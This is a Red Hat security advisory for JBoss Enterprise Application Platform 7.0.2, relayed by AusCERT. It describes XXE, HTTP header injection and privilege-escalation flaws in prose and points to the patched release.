Synopsis:          Important: JBoss Enterprise Application Platform 7.0.2
Advisory ID:       RHSA-2016:1841-01
Product:           Red Hat JBoss Enterprise Application Platform
Advisory URL:      https://rhn.redhat.com/errata/RHSA-2016-1841.html
Issue date:        2016-09-08
CVE Names:         CVE-2015-0254 CVE-2016-4993 CVE-2016-5406 
=====================================================================

1. Summary:

Updated packages that provide Red Hat JBoss Enterprise Application Platform
7.0.2, fix several bugs, and add various enhancements are now available
from the Customer Portal.

Red Hat Product Security has rated this update as having a security impact
of Important. A Common Vulnerability Scoring System (CVSS) base score,
which gives a detailed severity rating, is available for each vulnerability
from the CVE link(s) in the References section.

2. Description:

Red Hat JBoss Enterprise Application Platform 7 is an application server
that serves as a middleware platform and is built on open standards and
compliant with the Java EE 7 specification.

This release serves as a replacement for Red Hat JBoss Enterprise
Application Platform 7.0.1. It includes bug fixes and enhancements. Refer
to the JBoss Enterprise Application Platform 7.0.2 Release Notes linked to
in the References section for information about the most significant bug
fixes and enhancements included in this release.

Security Fix(es):

* It was found that the Java Standard Tag Library (JSTL) allowed the
processing of untrusted XML documents to utilize external entity
references, which could access resources on the host system and,
potentially, allowing arbitrary code execution. (CVE-2015-0254)

* It was reported that EAP 7 Application Server/Undertow web server is
vulnerable to the injection of arbitrary HTTP headers, and also response
splitting, due to insufficient sanitization and validation of user input
before the input is used as part of an HTTP header value. (CVE-2016-4993)

* The domain controller will not propagate its administrative RBAC
configuration to some slaves. An attacker could use this to escalate their
privileges. (CVE-2016-5406)

Red Hat would like to thank Calum Hutton (NCC Group) and Mikhail Egorov
(Odin) for reporting CVE-2016-4993. The CVE-2016-5406 issue was discovered
by Tomaz Cerar (Red Hat).

3. Solution:

Before applying this update, back up your existing Red Hat JBoss Enterprise
Application Platform installation and deployed applications.

The References section of this erratum contains a download link (you must
log in to download the update).

The JBoss server process must be restarted for the update to take effect.

4. Bugs fixed (https://bugzilla.redhat.com/):

1198606 - CVE-2015-0254 jakarta-taglibs-standard: XXE and RCE via XSL extension in JSTL XML tags
1359014 - CVE-2016-5406 EAP7 Privilege escalation when managing domain including earlier version slaves

5. References:

https://access.redhat.com/security/cve/CVE-2015-0254
https://access.redhat.com/security/cve/CVE-2016-4993
https://access.redhat.com/security/cve/CVE-2016-5406
https://access.redhat.com/security/updates/classification/#important
https://access.redhat.com/documentation/en/red-hat-jboss-enterprise-application-platform/version-7.0/702-release-notes/
https://access.redhat.com/documentation/en/red-hat-jboss-enterprise-application-platform/version-7.0/installation-guide/
https://access.redhat.com/documentation/en/jboss-enterprise-application-platform/
https://access.redhat.com/jbossnetwork/restricted/listSoftware.html?product=appplatform&downloadType=securityPatches&version=7.0

6. Contact:

The Red Hat security contact is <secalert@redhat.com>. More contact
details at https://access.redhat.com/security/team/contact/

Copyright 2016 Red Hat, Inc.
- -----BEGIN PGP SIGNATURE-----
Version: GnuPG v1

iD8DBQFX0bEKXlSAg2UNWIIRAkewAJ9OkY6rQWqj4XN9fJ7sXk2ekYTkNgCgoDBt
1LrdRKmug4uwyJVeFmOqWgQ=
=EQC4
- -----END PGP SIGNATURE-----

- --------------------------END INCLUDED TEXT--------------------

You have received this e-mail bulletin as a result of your organisation's
registration with AusCERT. The mailing list you are subscribed to is
maintained within your organisation, so if you do not wish to continue
receiving these bulletins you should contact your local IT manager. If
you do not know who that is, please send an email to auscert@auscert.org.au
and we will forward your request to the appropriate person.

NOTE: Third Party Rights
This security bulletin is provided as a service to AusCERT's members.  As
AusCERT did not write the document quoted above, AusCERT has had no control
over its content. The decision to follow or act on information or advice
contained in this security bulletin is the responsibility of each user or
organisation, and should be considered in accordance with your organisation's
site policies and procedures. AusCERT takes no responsibility for consequences
which may arise from following or acting on information or advice contained in
this security bulletin.

NOTE: This is only the original release of the security bulletin.  It may
not be updated when updates to the original are made.  If downloading at
a later date, it is recommended that the bulletin is retrieved directly
from the author's website to ensure that the information is still current.

Contact information for the authors of the original document is included
in the Security Bulletin above.  If you have any questions or need further
information, please contact them directly.

Previous advisories and external security bulletins can be retrieved from:

        http://www.auscert.org.au/render.html?cid=1980

===========================================================================
Australian Computer Emergency Response Team
The University of Queensland
Brisbane
Qld 4072

Internet Email: auscert@auscert.org.au
Facsimile:      (07) 3365 7031
Telephone:      (07) 3365 4417 (International: +61 7 3365 4417)
                AusCERT personnel answer during Queensland business hours
                which are GMT+10:00 (AEST).
                On call after hours for member emergencies only.
===========================================================================
-----BEGIN PGP SIGNATURE-----
Comment: http://www.auscert.org.au/render.html?it=1967

iQIVAwUBV9IJnox+lLeg9Ub1AQhNfQ/+OHewTfe1+RpmsW19BX/gjT8odYbf6cPk
iTBaAmPapX5ixurj0o3s84uuzCFmskQ0HhKaTDGRlChyx2PWJ4Sm1SSngH7r7ZVl
dr6qcHJfaFx4eYXje1xs6ZWG6eV1nKQ+fT5P4K2SES+iQxjAtYcMU+DIX/tTZbjb
3+NkvsWXNa0tezqZ2XELFegUqNADXVdrsYBI2S0teXKfq63wbLWhdo9hgPhj++yi
tg16H8XKs9psZneQPGnanV+wcD3KwXVKAQ1kemrdNAfFu6Wn8wNX/sLrrzCzKmzq
25Q0y3Tv7qkqz+A5CTKhoUUp4Q6yZ7tw/tA5ZDKplv8DY+gjPDyXP6VabGH5UuCG
ChNR+FawVD2/nZ7oXR82qS5CuWI6cyn/BCe3yljLRtUiv8DRXA1qcbnTcpvQYdd8
hsuttX9mSBHt2216lj9SOGIFgiE4Vk7/irgTJORxBafaUB29FyBnkh3+nRZyDfMf
a+53VsjX6VzghFKjbs5zuKuN0nrcK/O+wnUCCrc0G72z9JJB6aQeP8IMrOKjiyCR
Zy3CvI55JEPFiuQOqaYDJUh3Tik+hx+/J5aqPAcJ5/rx/+7Yz611I0hX7use3Ye+
WFpy5owDQCT0daWFNERTYZp0B1G6TRfNKLFfsKqx5elAu7WPVT0NaNA9Rvz6y/Ce
7PeE+dBrHc8=
=fZB/
-----END PGP SIGNATURE-----